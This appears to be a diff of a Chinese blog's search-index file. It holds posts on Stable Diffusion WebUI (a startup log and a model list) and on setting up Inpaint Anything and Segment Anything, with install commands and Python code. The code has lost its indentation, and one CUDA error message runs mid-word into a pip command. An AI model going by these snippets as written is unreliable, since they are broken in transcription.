    [2024-11-22 10:09:55,238][DEBUG][botocore.endpoint] - Making request for OperationModel(name=GetCallerIdentity) with params: {'url_path': '/', 'query_string': '', 'method': 'POST', 'headers': {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 'User-Agent': 'Boto3/1.26.144 Python/3.10.6 Linux/5.4.0-182-generic Botocore/1.29.144'}, 'body': {'Action': 'GetCallerIdentity', 'Version': '2011-06-15'}, 'url': 'https://sts.amazonaws.com/', 'context': {'client_region': 'aws-global', 'client_config': <botocore.config.Config object at 0x7fd6b31d9960>, 'has_streaming_input': False, 'auth_type': 'v4', 'signing': {'region': 'us-east-1', 'signing_name': 'sts'}}}
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event request-created.sts.GetCallerIdentity: calling handler <bound method RequestSigner.handler of <botocore.signers.RequestSigner object at 0x7fd6b31d9ab0>>
    [2024-11-22 10:09:55,239][DEBUG][botocore.hooks] - Event choose-signer.sts.GetCallerIdentity: calling handler <function set_operation_specific_signer at 0x7fd7d6e0ff40>

    To create a public link, set `share=True` in `launch()`.
    ----------------- light_diffusion_flow api start------------------
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Task queue is empty
    [2024-11-22 10:09:57,427][INFO][sd] - [AgentScheduler] Registering APIs
    Startup time: 30.2s (prepare environment: 1.8s, import torch: 6.2s, import gradio: 1.1s, setup paths: 0.5s, initialize shared: 0.2s, other imports: 0.5s, load scripts: 11.1s, create ui: 3.5s, gradio launch: 2.6s, app_started_callback: 2.6s).
    a1535d0a42ce4f8822ed034c15aeff62cc515836e388511d294645d11db8c10d
    Loading weights [a1535d0a42] from /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors
    Creating model from config: /root/stable-diffusion-webui/configs/v1-inference.yaml
    Applying attention optimization: xformers... done.
    Model loaded in 13.2s (calculate hash: 11.6s, create model: 0.5s, apply weights to model: 0.8s, calculate empty prompt: 0.1s).
    refresh_ui
    [2024-11-22 10:12:54,488][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,492][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,495][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,500][DEBUG][git.cmd] - Popen(['git', 'remote', 'get-url', '--all', 'origin'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,502][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch-check'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:12:54,504][DEBUG][git.cmd] - Popen(['git', 'cat-file', '--batch'], cwd=/root/stable-diffusion-webui, stdin=<valid stream>, shell=False, universal_newlines=False)
    [2024-11-22 10:14:08,139][INFO][modules.shared_state] - Starting job task(5iw18yq6o0rkn76)
    Warning: field infotext in API payload not found in <modules.processing.StableDiffusionProcessingTxt2Img object at 0x7fd72428a710>.
    0%| | 0/20 [00:00<?, ?it/s]
    5%|██▏ | 1/20 [00:00<00:08, 2.31it/s]
    25%|███████████ | 5/20 [00:00<00:01, 8.25it/s]
    35%|███████████████▍ | 7/20 [00:00<00:01, 9.97it/s]
    45%|███████████████████▊ | 9/20 [00:01<00:00, 11.13it/s]
    55%|███████████████████████▋ | 11/20 [00:01<00:00, 11.91it/s]
    65%|███████████████████████████▉ | 13/20 [00:01<00:00, 11.51it/s]
    75%|████████████████████████████████▎ | 15/20 [00:01<00:00, 12.95it/s]
    85%|████████████████████████████████████▌ | 17/20 [00:01<00:00, 13.15it/s]
    95%|████████████████████████████████████████▊ | 19/20 [00:01<00:00, 13.33it/s]
    100%|███████████████████████████████████████████| 20/20 [00:01<00:00, 10.93it/s]

    Total progress: 100%|███████████████████████████| 20/20 [00:01<00:00, 11.42it/s]
    [2024-11-22 10:14:10,403][INFO][modules.shared_state] - Ending job task(5iw18yq6o0rkn76) (2.26 seconds)

    内置模型

    主流模型(大模型)

    • [Yuno779] Anything-ink(二次元)

    • [rqdwdw] Counterfeit-V3.0(二次元)

    • [newlifezfztty761] CuteYukiMix-specialchapter(二次元/特化可爱风格)

    • [stabilityai] SD_XL(通用)

    • [xiaolxl] GuoFeng4.1_2.5D_XL(2.5D/通用)

    • [GhostInShell] GhostMix-V2.0(2.5D)

    • [s6yx] rev_1.2.2(2.5D)

    • [Aitasai] darkSushiMixMix 大颗寿司 Mix(2.5D/二次元)

    推荐模型(大模型)

    • [CagliostroLab] Animagine-XL-V3(二次元)

    • [playgroundai] playground-v2-XL(13GB)(通用)

    • [Yuno779] Anything-V3.0(二次元)

    • [未知] momoko-e(二次元)

    • [swl-models] PVCGK(手办风格)

    • [xiaolxl] WestMagic(西幻/2.5D)

    经典模型(大模型)

    • [stabilityai] stable-diffusion-v1-5(通用)

    国风系列(大模型)

    • [xiaolxl] GuoFeng4.2XL(国风/通用)

    • [xiaolxl] GuoFeng4.0_Real_Beta(国风/通用)

    • [xiaolxl] GuoFeng3.4(2.5D/国风)

    • [xiaolxl] GuoFeng3.3(2.5D/国风)

    • [xiaolxl] GuoFeng3.2_light(2.5D/暗光特化/国风)

    • [xiaolxl] GuoFeng3.2(2.5D/国风)

    • [xiaolxl] GuoFeng3.1(2.5D/国风)

    • [xiaolxl] GuoFeng2_MIX(2.5D/国风)

    • [xiaolxl] GuFengXL(二次元/古风/通用)

    • [xiaolxl] GuFeng2(二次元/古风)

    • [xiaolxl] GuFeng1(二次元/古风)

    常用Lora(Lora模型)

    • [xiaolxl] GuFengXL_Lora(古风)

    • [liaoliaojun-了了君] hanfuTang_v41_SDXL(汉服唐风)

    • [simhuang] MoXinV1(墨风)

    • [AlchemistW] 小人书2.0(小人书风格)

    • [liaoliaojun-了了君] 汉服3.0(汉服)

    • [CyberAIchemist] add_detail细节调整(细节调整)

    • [samecorner] blindbox_v1_mix(盲盒/手办/可爱)

    • [xiaolxl] Dream(梦幻)

    • [xiaolxl] WuMo2(武墨风)

    插件所需依赖/模型

    • Controlnet 预处理器(17GB+)

    • Controlnet_v1_1_SD1.5 模型_fp16(11GB+)

    • Controlnet_XL 模型_fp16(25GB+)

    • Controlnet 新增模型合集(20GB+)

    • Controlnet 新增 Lora 合集(1GB±)

    • AnimateDiff 动画模型(2GB+)

    • 常用 VAE 模型

    • AnimateDifV2 的 motionLoRA 和 v3AdapterLora(350MB)

    • AnimateDifV3 的 SparseControlNet 模型(2GB)

    • TAG 插件反推依赖模型包(3GB±)

    • Controlnet_v1_1_SD1.5 模型_fp16(11GB+)

    • Controlnet_XL 模型_fp16(25GB+)

    • Controlnet 新增模型合集(20GB+)

    • Controlnet 新增 Lora 合集(1GB±)

    • AnimateDiff 动画模型(2GB+)

    • 常用 VAE 模型

    • AnimateDifV2 的 motionLoRA 和 v3AdapterLora(350MB)

    • AnimateDifV3 的 SparseControlNet 模型(2GB)

    • TAG 插件反推依赖模型包(3GB±)

    模型网站

    ]]>
    @@ -7140,7 +7140,7 @@ /posts/Paper-Inpaint%20Anything/ - 资源

    笔记

    png

    Inpaint Anything 的插图。用户可以通过点击图像中的任何对象来选择它。借助强大的视觉模型,例如 SAM[7],LaMa[13] 和 Stable Diffusion (SD) [11],Inpaint Anything 能够平滑地移除物体(即移除任何物体)。此外,通过输入文本提示,用户可以用任何想要的内容填充对象(即填充任何内容)或任意替换对象的背景(即替换任何内容)。


    • 现代图像的 image inpainting system,常常与 mask selection 和 holes filling 作斗争。
    • 尝试了无蒙版图像的绘画,提出了一种“点击填充”的新范式,称之为 Inpainting Anything(IA)。支持三个主要功能:
      • Remove Anything,用户点击任何一个对象,IA 将删除它,并填充背景
        • SAM + SOTA
          • SAM已经在各种场景中展示了有前途的分割能力和计算机视觉基础模型的巨大潜力。这是向视觉人工通用智能迈出的突破性一步,SAM曾被誉为“CV版的ChatGPT”。
          • 研究了一种简单的单阶段方法LaMa[13]用于基于掩模的Inpaint,该方法通过结合快速傅里叶卷积(FFCs)[1]、感知损失[6]和积极的训练掩模生成策略,可以很好地生成重复的视觉结构。
      • Fill Anything,用户可以向 IA 提供基于文本的提示,然后通过 IA 驱动 Stable Diffusion 等 AIGC 模型,将相应的生成内容替换之
        • SAM + AIGC
        • 使用了一个强大的AIGC稳定扩散[11]模型,基于文本提示在洞中生成所需的内容
      • Replace Anything,使用 IA,用户可以选择保留点击选中的对象,并将剩余的背景替换为新生成的背景

    代码

    跑环境

    ​ 因为之前已经搭好了 segment-anything 的环境,所以 clone 一份:

    conda create -n inpaint-anything --clone segment-anything

    geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com) 下载代码:

    png

    在仓库目录下:

    python -m pip install -e segment_anything

    一大堆库,这玩意儿好慢啊!

    python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    下载预训练好的模型: sam_vit_h_4b8939.pthbig-lama(这个居然是俄罗斯的网盘,注册了老半天,真傻逼啊),并将它们放入 ./pretrained_models

    png

    在 pycharm 中的 Terminal 运行示例命令:

    python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

    又要下载一坨,等吧。

    png

    居然说我显存不够,寄!

    torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid frapip install git+https://github.com/openai/CLIP.git          
    ]]>
    + 资源

    笔记

    png

    Inpaint Anything 的插图。用户可以通过点击图像中的任何对象来选择它。借助强大的视觉模型,例如 SAM[7],LaMa[13] 和 Stable Diffusion (SD) [11],Inpaint Anything 能够平滑地移除物体(即移除任何物体)。此外,通过输入文本提示,用户可以用任何想要的内容填充对象(即填充任何内容)或任意替换对象的背景(即替换任何内容)。


    • 现代图像的 image inpainting system,常常与 mask selection 和 holes filling 作斗争。
    • 尝试了无蒙版图像的绘画,提出了一种“点击填充”的新范式,称之为 Inpainting Anything(IA)。支持三个主要功能:
      • Remove Anything,用户点击任何一个对象,IA 将删除它,并填充背景
        • SAM + SOTA
          • SAM已经在各种场景中展示了有前途的分割能力和计算机视觉基础模型的巨大潜力。这是向视觉人工通用智能迈出的突破性一步,SAM曾被誉为“CV版的ChatGPT”。
          • 研究了一种简单的单阶段方法LaMa[13]用于基于掩模的Inpaint,该方法通过结合快速傅里叶卷积(FFCs)[1]、感知损失[6]和积极的训练掩模生成策略,可以很好地生成重复的视觉结构。
      • Fill Anything,用户可以向 IA 提供基于文本的提示,然后通过 IA 驱动 Stable Diffusion 等 AIGC 模型,将相应的生成内容替换之
        • SAM + AIGC
        • 使用了一个强大的AIGC稳定扩散[11]模型,基于文本提示在洞中生成所需的内容
      • Replace Anything,使用 IA,用户可以选择保留点击选中的对象,并将剩余的背景替换为新生成的背景

    代码

    跑环境

    ​ 因为之前已经搭好了 segment-anything 的环境,所以 clone 一份:

    1
    conda create -n inpaint-anything --clone segment-anything

    geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com) 下载代码:

    png

    在仓库目录下:

    1
    python -m pip install -e segment_anything

    一大堆库,这玩意儿好慢啊!

    1
    python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    下载预训练好的模型: sam_vit_h_4b8939.pthbig-lama(这个居然是俄罗斯的网盘,注册了老半天,真傻逼啊),并将它们放入 ./pretrained_models

    png

    在 pycharm 中的 Terminal 运行示例命令:

    1
    python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

    又要下载一坨,等吧。

    png

    居然说我显存不够,寄!

    1
    torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid frapip install git+https://github.com/openai/CLIP.git          
    ]]>
    @@ -7175,7 +7175,7 @@ /posts/Paper-Segment%20Anything/ - 资源

    笔记

    • 介绍了一个 Segment Anything 项目

    • 建立了一个迄今为止最大的数据集,1B 个 蒙版 s 和 11M 张图像


    ​ 建立一个图像分割(image segmentation)基础模型(foundation model),即,开发一个提示模型(promptable model),并使用一个能够实现强大泛化能力(powerful generalization)的任务在广泛的数据集上进行预训练(pre-train)

    png

    ​ 该计划的成功取决于三个组成部分:

    • 什么样的**任务(task)**可以实现 zero-shot generalization?
      • 使用**提示分割任务(promptable segmentation task)作为预训练目标,通过提示工程(prompt engineering)**解决一般的下游分割任务。
        • 提示分割任务提出了一种自然的预训练算法,为每个训练样本模拟一系列提示(点、框、掩码)
          • 执行边缘检测
          • 分割所有内容,即,生成图像建议
          • 分割检测到的对象,即,实例分割
          • 作为概念验证,从自由格式文本中分割对象
    • 相应的模型(model)体系结构是什么?——Segment Anything Model,简称SAM,三个约束(three constraints)
      • 一个强大的图像编码器计算图像嵌入(powerful image encoder computes an image embedding
        • MAE pre-trained Vision Transformer(VIT)
      • 一个提示编码器嵌入提示prompt encoder embeds prompts
        • 考虑两组提示:稀疏(点、框、文本)和密集蒙版,通过位置编码来表示点和框,并对每个提示类型和使用 CLIP 的现成文本编码器的自由格式文本进行学习嵌入求和
      • 将两个信息源组合在一个轻量级的掩码解码器(lightweight mask decoder)中,预测分段蒙版(segmentation masks)
        • 有效地将图像嵌入、提示嵌入和输出令牌映射到蒙版
    • 哪些**数据(data)**可以为这项任务和模型提供支持?
      • **数据引擎(data engine)**分为三个阶段:
        • 辅助手动(assisted-manual),SAM 帮助注释器注释(annotate)蒙版
          • 类似经典的交互式分割(相当于PS?)
        • 半自动(semi-automatic),SAM 通过提示可能的对象位置来自动为对象子集生成蒙版
          • 向 annotators 展示预先填充了这些蒙版的图像,并要求它们注释任何其他未注释的对象
        • 全自动(fully automatic),SAM 用前景点的规则网络提示 SAM,平均每张图像生成约 100 个高质量蒙版
      • 数据集(dataset):SA-1B
        • 比现有最大的数据集 Open Images 多 11 倍的图像和 400 倍的蒙版
        • 11M 张图像,平均为 3300 * 4950 像素
        • 1B 个 蒙版,99.1% 是自动生成的,经过证实 IoU 很高,质量很好
        • 负责任的 AI(responsible AI,简称 RAI),数据集的图像在全球分布均衡

    代码

    配环境

    ​ 新建一个 conda 环境:

    conda create -n segment-anything python=3.9

    ​ 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

    png

    conda activate segment-anything

    转到下载的目录下:

    pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
    pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

    ​ 在 facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com) 中,把代码下载下来:

    png

    ​ 在下载下的仓库的根目录上,安装segment-anything

    pip install -e .

    ​ 下载预训练好的模型sam_vit_h_4b8939.pthViT-H SAM model,也放到仓库根目录下:

    当然也可以选择其他模型:

    png

    跑!

    1. 导入相关库

    import torch
    import torchvision
    print("PyTorch version:", torch.__version__)
    print("Torchvision version:", torchvision.__version__)
    print("CUDA is available:", torch.cuda.is_available())
    PyTorch version: 1.13.1+cu117Torchvision version: 0.14.1+cu117CUDA is available: True
    import numpy as np
    import torch
    import matplotlib.pyplot as plt
    import cv2

    import sys
    sys.path.append("..")
    from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

    # 防止使用 matplotlib 时内核挂掉
    import os
    os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"

    2. 读取待分割的图像

    image = cv2.imread('images/chess.jpg')
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    plt.figure(figsize=(10,10))
    plt.imshow(image)
    plt.axis('off')
    plt.show()

    png

    3. 载入待分割的模型

    sam_checkpoint = "../sam_vit_h_4b8939.pth"
    model_type = "vit_h"

    device = "cuda"

    sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
    sam.to(device=device)

    4. 设置参数

    ​ 自动 mask 生成中有几个可调参数,用于控制采样点的密度以及去除低质量或重复 mask 的阈值。
    ​ 此外,生成可以在图像裁剪上自动运行,以提高较小对象的性能,后处理可以去除杂散像素和孔洞。以下是对更多 masks 进行采样的示例配置:https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35
    ​ 使用一些设置重新运行以下命令,例如。 iou_thresh0.860.9score_thresh0.920.96

    ​ 使用 SAM 模型,为整个图像生成蒙版。在图像上生成点提示网络,然后进行过滤低质量和重复的蒙版。默认选择设置具有 ViT-H 主干的 SAM:

    SamAutomaticMaskGenerator() 参数:

    • model (Sam):用于 mask 预测的 SAM 模型。

    • points_per_side(int 或 None):沿图像一侧采样的点数。 总点数为 points_per_side**2。 如果为 Nonepoint_grids 必须提供明确的点采样。

    • points_per_batch (int):设置模型同时运行的点数。 更高的数字可能会更快,但会使用更多的显存。

    • pred_iou_thresh (float): [0,1] 中的过滤阈值,使用模型的预测 mask 质量。

    • stability_score_thresh (float)[0,1] 中的过滤阈值,使用 mask 在用于二值化模型 mask 预测的截止值变化下的稳定性。

    • stability_score_offset (float):计算稳定性分数时偏移截止值的量。

    • box_nms_thresh (float):非最大抑制用来过滤重复 masks 的 box IoU cutoff。

    • crops_n_layers (int): 如果 >0,mask 预测将再次运行图像的 crop。 设置要运行的层数,其中每层有 2**i_layer 个图像裁剪。

    • crops_nms_thresh (float): 非最大抑制使用的框 IoU 截止值,用于过滤不同 crops 之间的重复 masks。

    • crop_overlap_ratio (float): 设置 crops 重叠的程度。在第一个 crop 层中,crop 将重叠图像长度的这个分数。 具有更多 crops 的后期层缩小了这种重叠。

    • crop_n_points_downscale_factor (int): 在第 n 层中每边采样的点数按 crop_n_points_downscale_factor**n 缩小。

    • point_grids(list(np.ndarray)或 None):用于采样的点的显式网格列表,归一化为 [0,1]。 列表中的第 n 个网格用于第 n 个裁剪层 points_per_side 独占。

    • min_mask_region_area (int):如果 >0,将应用后处理以移除面积小于 min_mask_region_area 的掩模中的断开区域和孔。 需要opencv

    • output_mode (str):返回的形式掩码。可以是 binary_maskuncompressed_rlecoco_rlecoco_rle 需要 pycocotools。对于大分辨率,binary_mask 可能会消耗大量内存。

    mask_generator_ = SamAutomaticMaskGenerator(
    model=sam,
    points_per_side=64,
    pred_iou_thresh=0.98,
    stability_score_thresh=0.96,
    crop_n_layers=1,
    crop_n_points_downscale_factor=2,
    min_mask_region_area=100, # Requires open-cv to run post-processing
    )

    4. 分割

    masks = mask_generator_.generate(image)
    print(len(masks))  # 输出分割出的类数
    55

    ​ Mask generation 生成返回一个 list over masks,其中每个 mask 都是一个包含有关 mask 的各种数据的字典。 这些键是:

    • segmentation:mask
    • area:mask 的面积(以像素为单位)
    • bbox:XYWH 格式的掩码边界框
    • predicted_iou:模型自己对 mask 质量的预测
    • point_coords:生成此 mask 的采样输入点
    • stability_score:mask 质量的额外衡量标准
    • crop_box:用于生成 XYWH 格式 mask 的图像裁剪
    def show_anns(anns):
    if len(anns) == 0:
    return
    sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
    """
    plt.gca() 是 matplotlib 库中的一个函数,其作用是获取当前图形的坐标轴对象。
    在绘制多个子图时,我们可以在调用子图方法时使用 subplot 函数来指定图的位置,
    但如果想对这些子图进行进一步的个性化设置,就需要得到每个子图的坐标轴对象。
    使用 plt.gca() 函数可以获取当前图像的Axes对象,
    我们可以通过该对象进行坐标轴范围设置、坐标轴标签设置、坐标轴刻度设置等操作。
    """
    ax = plt.gca()
    ax.set_autoscale_on(False)
    polygons = []
    color = []
    for ann in sorted_anns:
    m = ann['segmentation'] # 获取 mask
    img = np.ones((m.shape[0], m.shape[1], 3))
    color_mask = np.random.random((1, 3)).tolist()[0]
    for i in range(3): # 随机上色
    img[:,:,i] = color_mask[i]
    """
    这行代码使用 matplotlib 库中的 imshow() 函数将图像 img 和常数变量 m * 0.35 在水平方向上连接起来形成一个新的 RGB 图像,
    然后将其显示在坐标轴对象 ax 上。
    更具体地说,np.dstack((img, m * 0.35)) 调用了 numpy 库的 dstack() 函数,
    将两个具有相同形状的二维数组 img 和 m * 0.35 沿着第三个维度(深度)进行堆叠,形成一个新的三维数组。
    其中,第三个维度上的元素依次为 img 对应位置的像素值和 m * 0.35 对应位置的数字,
    因此可以看作是在原始图像的基础上加上了一层颜色偏移。
    ax.imshow() 将这个三维数组作为输入数据,利用默认的参数对图像进行处理,
    包括调整颜色映射、插值方式等等,并将其显示在指定的坐标轴对象上。
    """
    ax.imshow(np.dstack((img, m * 0.35)))
    plt.figure(figsize=(10,10))
    plt.imshow(image)
    show_anns(masks)
    plt.axis('off')
    plt.show()

    png

    ]]>
    + 资源

    笔记

    • 介绍了一个 Segment Anything 项目

    • 建立了一个迄今为止最大的数据集,1B 个 蒙版 s 和 11M 张图像


    ​ 建立一个图像分割(image segmentation)基础模型(foundation model),即,开发一个提示模型(promptable model),并使用一个能够实现强大泛化能力(powerful generalization)的任务在广泛的数据集上进行预训练(pre-train)

    png

    ​ 该计划的成功取决于三个组成部分:

    • 什么样的**任务(task)**可以实现 zero-shot generalization?
      • 使用**提示分割任务(promptable segmentation task)作为预训练目标,通过提示工程(prompt engineering)**解决一般的下游分割任务。
        • 提示分割任务提出了一种自然的预训练算法,为每个训练样本模拟一系列提示(点、框、掩码)
          • 执行边缘检测
          • 分割所有内容,即,生成图像建议
          • 分割检测到的对象,即,实例分割
          • 作为概念验证,从自由格式文本中分割对象
    • 相应的模型(model)体系结构是什么?——Segment Anything Model,简称SAM,三个约束(three constraints)
      • 一个强大的图像编码器计算图像嵌入(powerful image encoder computes an image embedding
        • MAE pre-trained Vision Transformer(VIT)
      • 一个提示编码器嵌入提示prompt encoder embeds prompts
        • 考虑两组提示:稀疏(点、框、文本)和密集蒙版,通过位置编码来表示点和框,并对每个提示类型和使用 CLIP 的现成文本编码器的自由格式文本进行学习嵌入求和
      • 将两个信息源组合在一个轻量级的掩码解码器(lightweight mask decoder)中,预测分段蒙版(segmentation masks)
        • 有效地将图像嵌入、提示嵌入和输出令牌映射到蒙版
    • 哪些**数据(data)**可以为这项任务和模型提供支持?
      • **数据引擎(data engine)**分为三个阶段:
        • 辅助手动(assisted-manual),SAM 帮助注释器注释(annotate)蒙版
          • 类似经典的交互式分割(相当于PS?)
        • 半自动(semi-automatic),SAM 通过提示可能的对象位置来自动为对象子集生成蒙版
          • 向 annotators 展示预先填充了这些蒙版的图像,并要求它们注释任何其他未注释的对象
        • 全自动(fully automatic),SAM 用前景点的规则网络提示 SAM,平均每张图像生成约 100 个高质量蒙版
      • 数据集(dataset):SA-1B
        • 比现有最大的数据集 Open Images 多 11 倍的图像和 400 倍的蒙版
        • 11M 张图像,平均为 3300 * 4950 像素
        • 1B 个 蒙版,99.1% 是自动生成的,经过证实 IoU 很高,质量很好
        • 负责任的 AI(responsible AI,简称 RAI),数据集的图像在全球分布均衡

    代码

    配环境

    ​ 新建一个 conda 环境:

    1
    conda create -n segment-anything python=3.9

    ​ 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

    png

    1
    conda activate segment-anything

    转到下载的目录下:

    1
    pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
    1
    pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

    ​ 在 facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com) 中,把代码下载下来:

    png

    ​ 在下载下的仓库的根目录上,安装segment-anything

    1
    pip install -e .

    ​ 下载预训练好的模型sam_vit_h_4b8939.pthViT-H SAM model,也放到仓库根目录下:

    当然也可以选择其他模型:

    png

    跑!

    1. 导入相关库

    1
    2
    3
    4
    5
    import torch
    import torchvision
    print("PyTorch version:", torch.__version__)
    print("Torchvision version:", torchvision.__version__)
    print("CUDA is available:", torch.cuda.is_available())
    PyTorch version: 1.13.1+cu117Torchvision version: 0.14.1+cu117CUDA is available: True
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import numpy as np
    import torch
    import matplotlib.pyplot as plt
    import cv2

    import sys
    sys.path.append("..")
    from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

    # 防止使用 matplotlib 时内核挂掉
    import os
    os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"

    2. 读取待分割的图像

    1
    2
    image = cv2.imread('images/chess.jpg')
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    1
    2
    3
    4
    plt.figure(figsize=(10,10))
    plt.imshow(image)
    plt.axis('off')
    plt.show()

    png

    3. 载入待分割的模型

    1
    2
    3
    4
    5
    6
    7
    8
    sam_checkpoint = "../sam_vit_h_4b8939.pth"
    model_type = "vit_h"

    device = "cuda"

    sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
    sam.to(device=device)

    4. 设置参数

    ​ 自动 mask 生成中有几个可调参数,用于控制采样点的密度以及去除低质量或重复 mask 的阈值。
    ​ 此外,生成可以在图像裁剪上自动运行,以提高较小对象的性能,后处理可以去除杂散像素和孔洞。以下是对更多 masks 进行采样的示例配置:https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35
    ​ 使用一些设置重新运行以下命令,例如。 iou_thresh0.860.9score_thresh0.920.96

    ​ 使用 SAM 模型,为整个图像生成蒙版。在图像上生成点提示网络,然后进行过滤低质量和重复的蒙版。默认选择设置具有 ViT-H 主干的 SAM:

    SamAutomaticMaskGenerator() 参数:

    • model (Sam):用于 mask 预测的 SAM 模型。

    • points_per_side(int 或 None):沿图像一侧采样的点数。 总点数为 points_per_side**2。 如果为 Nonepoint_grids 必须提供明确的点采样。

    • points_per_batch (int):设置模型同时运行的点数。 更高的数字可能会更快,但会使用更多的显存。

    • pred_iou_thresh (float): [0,1] 中的过滤阈值,使用模型的预测 mask 质量。

    • stability_score_thresh (float)[0,1] 中的过滤阈值,使用 mask 在用于二值化模型 mask 预测的截止值变化下的稳定性。

    • stability_score_offset (float):计算稳定性分数时偏移截止值的量。

    • box_nms_thresh (float):非最大抑制用来过滤重复 masks 的 box IoU cutoff。

    • crops_n_layers (int): 如果 >0,mask 预测将再次运行图像的 crop。 设置要运行的层数,其中每层有 2**i_layer 个图像裁剪。

    • crops_nms_thresh (float): 非最大抑制使用的框 IoU 截止值,用于过滤不同 crops 之间的重复 masks。

    • crop_overlap_ratio (float): 设置 crops 重叠的程度。在第一个 crop 层中,crop 将重叠图像长度的这个分数。 具有更多 crops 的后期层缩小了这种重叠。

    • crop_n_points_downscale_factor (int): 在第 n 层中每边采样的点数按 crop_n_points_downscale_factor**n 缩小。

    • point_grids(list(np.ndarray)或 None):用于采样的点的显式网格列表,归一化为 [0,1]。 列表中的第 n 个网格用于第 n 个裁剪层 points_per_side 独占。

    • min_mask_region_area (int):如果 >0,将应用后处理以移除面积小于 min_mask_region_area 的掩模中的断开区域和孔。 需要opencv

    • output_mode (str):返回的形式掩码。可以是 binary_maskuncompressed_rlecoco_rlecoco_rle 需要 pycocotools。对于大分辨率,binary_mask 可能会消耗大量内存。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    mask_generator_ = SamAutomaticMaskGenerator(
    model=sam,
    points_per_side=64,
    pred_iou_thresh=0.98,
    stability_score_thresh=0.96,
    crop_n_layers=1,
    crop_n_points_downscale_factor=2,
    min_mask_region_area=100, # Requires open-cv to run post-processing
    )

    4. 分割

    1
    masks = mask_generator_.generate(image)
    1
    print(len(masks))  # 输出分割出的类数
    55

    ​ Mask generation 生成返回一个 list over masks,其中每个 mask 都是一个包含有关 mask 的各种数据的字典。 这些键是:

    • segmentation:mask
    • area:mask 的面积(以像素为单位)
    • bbox:XYWH 格式的掩码边界框
    • predicted_iou:模型自己对 mask 质量的预测
    • point_coords:生成此 mask 的采样输入点
    • stability_score:mask 质量的额外衡量标准
    • crop_box:用于生成 XYWH 格式 mask 的图像裁剪
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    def show_anns(anns):
    if len(anns) == 0:
    return
    sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
    """
    plt.gca() 是 matplotlib 库中的一个函数,其作用是获取当前图形的坐标轴对象。
    在绘制多个子图时,我们可以在调用子图方法时使用 subplot 函数来指定图的位置,
    但如果想对这些子图进行进一步的个性化设置,就需要得到每个子图的坐标轴对象。
    使用 plt.gca() 函数可以获取当前图像的Axes对象,
